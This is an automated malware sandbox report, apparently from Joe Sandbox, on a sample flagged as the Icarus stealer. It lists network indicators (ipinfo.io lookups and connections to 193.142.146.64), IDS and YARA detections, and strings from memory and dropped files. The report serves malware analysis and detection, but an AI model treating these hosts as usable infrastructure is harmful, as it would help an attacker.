                  Source: Joe Sandbox ViewIP Address: 34.117.59.81 34.117.59.81
                  Source: Joe Sandbox ViewIP Address: 34.117.59.81 34.117.59.81
                  Source: Joe Sandbox ViewASN Name: HOSTSLICK-GERMANYNL HOSTSLICK-GERMANYNL
                  Source: unknownDNS query: name: ipinfo.io
                  Source: unknownDNS query: name: ipinfo.io
                  Source: unknownDNS query: name: ipinfo.io
                  Source: unknownDNS query: name: ipinfo.io
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49833 -> 34.117.59.81:80
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:50432 -> 34.117.59.81:80
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:50494 -> 34.117.59.81:80
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:50482 -> 34.117.59.81:80
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:50484 -> 34.117.59.81:80
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:50474 -> 34.117.59.81:80
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:50450 -> 34.117.59.81:80
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:50486 -> 34.117.59.81:80
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:50498 -> 34.117.59.81:80
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:50500 -> 34.117.59.81:80
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:50454 -> 34.117.59.81:80
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.142.146.64
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.142.146.64
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.142.146.64
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.142.146.64
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.142.146.64
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.142.146.64
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.142.146.64
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.142.146.64
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.142.146.64
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.142.146.64
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.142.146.64
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.142.146.64
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.142.146.64
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.142.146.64
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.142.146.64
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.142.146.64
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.142.146.64
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.142.146.64
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.142.146.64
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.142.146.64
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.142.146.64
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.142.146.64
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.142.146.64
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.142.146.64
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.142.146.64
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.142.146.64
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.142.146.64
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.142.146.64
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.142.146.64
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.142.146.64
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.142.146.64
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.142.146.64
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.142.146.64
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.142.146.64
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.142.146.64
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.142.146.64
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.142.146.64
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.142.146.64
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.142.146.64
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.142.146.64
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.142.146.64
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.142.146.64
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.142.146.64
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.142.146.64
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.142.146.64
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.142.146.64
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.142.146.64
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.142.146.64
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.142.146.64
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.142.146.64
                  Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.io
                  Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.io
                  Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.io
                  Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.io
                  Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.io
                  Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.io
                  Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.io
                  Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.io
                  Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.io
                  Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.io
                  Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.io
                  Source: global trafficDNS traffic detected: DNS query: ipinfo.io
                  Source: global trafficDNS traffic detected: DNS query: 15.164.165.52.in-addr.arpa
                  Source: licarisan_api.exe, EyesUpdater.exe.0.drString found in binary or memory: http://ascstats.iobit.com/usage.phpU
                  Source: licarisan_api.exe, EyesUpdater.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                  Source: licarisan_api.exe, EyesUpdater.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                  Source: licarisan_api.exe, EyesUpdater.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                  Source: licarisan_api.exe, EyesUpdater.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                  Source: licarisan_api.exe, EyesUpdater.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                  Source: licarisan_api.exe, EyesUpdater.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                  Source: licarisan_api.exe, EyesUpdater.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                  Source: EyesUpdater.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                  Source: licarisan_api.exe, EyesUpdater.exe.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                  Source: cvtres.exe, 0000000C.00000002.2507488327.00000000030DF000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000003103000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000003004000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.000000000304C000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.000000000307E000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.00000000030D3000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000003152000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000003072000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000003090000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000003010000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.00000000030AF000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.000000000314A000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.00000000030CD000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.00000000030EA000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000003040000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000003143000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.000000000309C000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.00000000030BB000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.00000000030D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ipinfo.io
                  Source: csc.exe, 0000000A.00000002.1448247892.0000000008445000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2503619664.0000000000402000.00000040.00000400.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ipinfo.io/ip
                  Source: cvtres.exe, 0000000C.00000002.2507488327.00000000030DF000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000003103000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000003004000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.000000000304C000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.000000000307E000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.00000000030D3000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000003152000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000003072000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000003090000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000003010000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.00000000030AF000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.000000000314A000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.00000000030CD000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.00000000030EA000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000003040000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.000000000309C000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.00000000030BB000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.00000000030D9000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.000000000308A000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000003034000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ipinfo.io/ipd
                  Source: cvtres.exe, 0000000C.00000002.2507488327.00000000030DF000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000003004000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.000000000307E000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.00000000030D3000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000003152000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000003072000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000003090000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.00000000030AF000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.000000000314A000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.00000000030CD000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.00000000030EA000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000003040000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000003143000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.000000000309C000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.00000000030BB000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.00000000030D9000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.000000000308A000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000003034000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.00000000030C7000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.000000000303A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ipinfo.iod
                  Source: licarisan_api.exe, EyesUpdater.exe.0.drString found in binary or memory: http://ocsp.digicert.com0
                  Source: licarisan_api.exe, EyesUpdater.exe.0.drString found in binary or memory: http://ocsp.digicert.com0A
                  Source: licarisan_api.exe, EyesUpdater.exe.0.drString found in binary or memory: http://ocsp.digicert.com0C
                  Source: licarisan_api.exe, EyesUpdater.exe.0.drString found in binary or memory: http://ocsp.digicert.com0X
                  Source: licarisan_api.exe, EyesUpdater.exe.0.drString found in binary or memory: http://piriform.com/go/app_cc_license_agreement
                  Source: licarisan_api.exe, EyesUpdater.exe.0.drString found in binary or memory: http://piriform.com/go/app_cc_privacy_policy
                  Source: cvtres.exe, 0000000C.00000002.2507488327.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: licarisan_api.exe, EyesUpdater.exe.0.drString found in binary or memory: http://www.digicert.com/CPS0
                  Source: licarisan_api.exe, EyesUpdater.exe.0.drString found in binary or memory: http://www.piriform.com/ccleaner
                  Source: cvtres.exe, 0000000C.00000002.2503619664.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://i.ibb.co/RvwvG2z/icaruwsdr-athens.png

                  E-Banking Fraud

                  barindex
                  Yara detected Icarus stealer
                  Source: Yara matchFile source: 12.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.csc.exe.852cc18.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.csc.exe.852cc18.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000C.00000002.2503619664.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.1448247892.0000000008445000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: csc.exe PID: 7584, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: cvtres.exe PID: 7640, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 10_2_05824800 CreateDesktopA,10_2_05824800

                  System Summary

                  barindex
                  .NET source code contains suspicious base64 encoded strings
                  Source: 0.2.licarisan_api.exe.724afa.0.raw.unpack, GLBIU47KBU1H.csBase64 encoded string: System.Security.
                  .NET source code contains very large strings
                  Source: 0.2.licarisan_api.exe.724afa.0.raw.unpack, YGRKZZ70EYH6.csLong String: Length: 223008
                  Drops large PE files
                  Source: C:\Users\user\Desktop\licarisan_api.exeFile dump: EyesUpdater.exe.0.dr 976635604Jump to dropped file
                  Source: C:\Users\user\Desktop\licarisan_api.exeCode function: 0_2_0042E946 NtQueryDefaultLocale,0_2_0042E946
                  Source: C:\Users\user\Desktop\licarisan_api.exeCode function: 0_2_0042FF22 NtQueryDefaultLocale,0_2_0042FF22
                  Source: C:\Users\user\Desktop\licarisan_api.exeCode function: 0_2_0042EC16 NtQueryDefaultLocale,0_2_0042EC16
                  Source: C:\Users\user\Desktop\licarisan_api.exeCode function: 0_2_0043016F NtQueryDefaultLocale,0_2_0043016F
                  Source: C:\Users\user\Desktop\licarisan_api.exeCode function: 0_2_0042E107 NtQueryDefaultLocale,0_2_0042E107
                  Source: C:\Users\user\Desktop\licarisan_api.exeCode function: 0_2_0042E524 NtQueryDefaultLocale,0_2_0042E524
                  Source: C:\Users\user\Desktop\licarisan_api.exeCode function: 0_2_0042E128 NtQueryDefaultLocale,0_2_0042E128
                  Source: C:\Users\user\Desktop\licarisan_api.exeCode function: 0_2_004301D6 NtQueryDefaultLocale,0_2_004301D6
                  Source: C:\Users\user\Desktop\licarisan_api.exeCode function: 0_2_0042E183 NtQueryDefaultLocale,0_2_0042E183
                  Source: C:\Users\user\Desktop\licarisan_api.exeCode function: 0_2_0042F6C1 NtQueryDefaultLocale,0_2_0042F6C1
                  Source: C:\Users\user\Desktop\licarisan_api.exeCode function: 0_2_0042FAD8 NtQueryDefaultLocale,0_2_0042FAD8
                  Source: C:\Users\user\Desktop\licarisan_api.exeCode function: 0_2_0042F6B2 NtQueryDefaultLocale,0_2_0042F6B2
                  Source: C:\Users\user\Desktop\licarisan_api.exeCode function: 0_2_0042EBBD NtQueryDefaultLocale,0_2_0042EBBD
                  Source: C:\Users\user\Desktop\licarisan_api.exeCode function: 0_2_004200860_2_00420086
                  Source: C:\Users\user\Desktop\licarisan_api.exeCode function: 0_2_00435E800_2_00435E80
                  Source: C:\Users\user\Desktop\licarisan_api.exeCode function: 0_2_0043702B0_2_0043702B
                  Source: C:\Users\user\Desktop\licarisan_api.exeCode function: 0_2_004358F40_2_004358F4
                  Source: C:\Users\user\Desktop\licarisan_api.exeCode function: 0_2_004359730_2_00435973
                  Source: C:\Users\user\Desktop\licarisan_api.exeCode function: 0_2_004351180_2_00435118
                  Source: C:\Users\user\Desktop\licarisan_api.exeCode function: 0_2_004355C40_2_004355C4
                  Source: C:\Users\user\Desktop\licarisan_api.exeCode function: 0_2_004255AF0_2_004255AF
                  Source: C:\Users\user\Desktop\licarisan_api.exeCode function: 0_2_00435A550_2_00435A55
                  Source: C:\Users\user\Desktop\licarisan_api.exeCode function: 0_2_0042F6C10_2_0042F6C1
                  Source: C:\Users\user\Desktop\licarisan_api.exeCode function: 0_2_004356A80_2_004356A8
                  Source: C:\Users\user\Desktop\licarisan_api.exeCode function: 0_2_004306B30_2_004306B3
                  Source: C:\Users\user\Desktop\licarisan_api.exeCode function: 0_2_0042EF710_2_0042EF71
                  Source: C:\Users\user\Desktop\licarisan_api.exeCode function: 0_2_004353C60_2_004353C6
                  Source: C:\Users\user\Desktop\licarisan_api.exeCode function: 0_2_004253D90_2_004253D9
                  Source: C:\Users\user\Desktop\licarisan_api.exeCode function: 0_2_007A6C250_2_007A6C25
                  Source: C:\Users\user\Desktop\licarisan_api.exeCode function: 0_2_007A51240_2_007A5124
                  Source: C:\Users\user\Desktop\licarisan_api.exeCode function: 0_2_007A70660_2_007A7066
                  Source: C:\Users\user\Desktop\licarisan_api.exeCode function: 0_2_007A742C0_2_007A742C
                  Source: C:\Users\user\Desktop\licarisan_api.exeCode function: 0_2_007A84140_2_007A8414
                  Source: C:\Users\user\Desktop\licarisan_api.exeCode function: 0_2_007AA8AF0_2_007AA8AF
                  Source: C:\Users\user\Desktop\licarisan_api.exeCode function: 0_2_007AA9010_2_007AA901
                  Source: C:\Users\user\Desktop\licarisan_api.exeCode function: 0_2_007AA5C70_2_007AA5C7
                  Source: C:\Users\user\Desktop\licarisan_api.exeCode function: 0_2_007A565E0_2_007A565E
                  Source: C:\Users\user\Desktop\licarisan_api.exeCode function: 0_2_007A960E0_2_007A960E
                  Source: C:\Users\user\Desktop\licarisan_api.exeCode function: 0_2_007A86DB0_2_007A86DB
                  Source: C:\Users\user\Desktop\licarisan_api.exeCode function: 0_2_007AA6D80_2_007AA6D8
                  Source: C:\Users\user\Desktop\licarisan_api.exeCode function: 0_2_007AA6C00_2_007AA6C0
                  Source: C:\Users\user\Desktop\licarisan_api.exeCode function: 0_2_007AA6810_2_007AA681
                  Source: C:\Users\user\Desktop\licarisan_api.exeCode function: 0_2_007A7B2D0_2_007A7B2D
                  Source: C:\Users\user\Desktop\licarisan_api.exeCode function: 0_2_007B24130_2_007B2413
                  Source: C:\Users\user\Desktop\licarisan_api.exeCode function: 0_2_007B54740_2_007B5474
                  Source: C:\Users\user\Desktop\licarisan_api.exeCode function: 0_2_007B48430_2_007B4843
                  Source: C:\Users\user\Desktop\licarisan_api.exeCode function: 0_2_007B48A50_2_007B48A5
                  Source: C:\Users\user\Desktop\licarisan_api.exeCode function: 0_2_007B45C60_2_007B45C6
                  Source: C:\Users\user\Desktop\licarisan_api.exeCode function: 0_2_007B467C0_2_007B467C
                  Source: C:\Users\user\Desktop\licarisan_api.exeCode function: 0_2_007B46770_2_007B4677
                  Source: C:\Users\user\Desktop\licarisan_api.exeCode function: 0_2_007B46310_2_007B4631
                  Source: C:\Users\user\Desktop\licarisan_api.exeCode function: 0_2_007B46C40_2_007B46C4
                  Source: C:\Users\user\Desktop\licarisan_api.exeCode function: 0_2_007B468A0_2_007B468A
                  Source: C:\Users\user\Desktop\licarisan_api.exeCode function: 0_2_007B4BD50_2_007B4BD5
                  Source: C:\Users\user\Desktop\licarisan_api.exeCode function: 0_2_007EF7360_2_007EF736
                  Source: C:\Users\user\Desktop\licarisan_api.exeCode function: 0_2_007F285D0_2_007F285D
                  Source: C:\Users\user\Desktop\licarisan_api.exeCode function: 0_2_007F40530_2_007F4053
                  Source: C:\Users\user\Desktop\licarisan_api.exeCode function: 0_2_007CD42B0_2_007CD42B
                  Source: C:\Users\user\Desktop\licarisan_api.exeCode function: 0_2_007CD1740_2_007CD174
                  Source: C:\Users\user\Desktop\licarisan_api.exeCode function: 0_2_007DBDF40_2_007DBDF4
                  Source: C:\Users\user\Desktop\licarisan_api.exeCode function: 0_2_007C8DF00_2_007C8DF0
                  Source: C:\Users\user\Desktop\licarisan_api.exeCode function: 0_2_007F29EE0_2_007F29EE
                  Source: C:\Users\user\Desktop\licarisan_api.exeCode function: 0_2_007DC9CB0_2_007DC9CB
                  Source: C:\Users\user\Desktop\licarisan_api.exeCode function: 0_2_007EF5A10_2_007EF5A1
                  Source: C:\Users\user\Desktop\licarisan_api.exeCode function: 0_2_007F018B0_2_007F018B
                  Source: C:\Users\user\Desktop\licarisan_api.exeCode function: 0_2_007EED820_2_007EED82
                  Source: C:\Users\user\Desktop\licarisan_api.exeCode function: 0_2_007F125E0_2_007F125E
                  Source: C:\Users\user\Desktop\licarisan_api.exeCode function: 0_2_007EEEF70_2_007EEEF7
                  Source: C:\Users\user\Desktop\licarisan_api.exeCode function: 0_2_007F17460_2_007F1746
                  Source: C:\Users\user\Desktop\licarisan_api.exeCode function: 0_2_007F0BD40_2_007F0BD4
                  Source: C:\Users\user\Desktop\licarisan_api.exeCode function: 0_2_007F3FC70_2_007F3FC7
                  Source: C:\Users\user\Desktop\licarisan_api.exeCode function: 0_2_007F07A90_2_007F07A9
                  Source: C:\Users\user\Desktop\licarisan_api.exeCode function: 0_2_007F13940_2_007F1394
                  Source: C:\Users\user\Desktop\licarisan_api.exeCode function: 0_2_0080F2BE0_2_0080F2BE
                  Source: C:\Users\user\Desktop\licarisan_api.exeCode function: 0_2_008224CC0_2_008224CC
                  Source: C:\Users\user\Desktop\licarisan_api.exeCode function: 0_2_0080F0E20_2_0080F0E2
                  Source: C:\Users\user\Desktop\licarisan_api.exeCode function: 0_2_007FD56A0_2_007FD56A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 12_2_016063B912_2_016063B9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 12_2_01609AD012_2_01609AD0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 12_2_01609ABF12_2_01609ABF
                  Source: licarisan_api.exe, 00000000.00000002.1516311432.0000000000724000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenShot.exe, vs licarisan_api.exe
                  Source: licarisan_api.exe, 00000000.00000002.1516311432.0000000000724000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameStub.exe" vs licarisan_api.exe
                  Source: licarisan_api.exe, 00000000.00000000.1260050152.00000000006C0000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenShot.exe, vs licarisan_api.exe
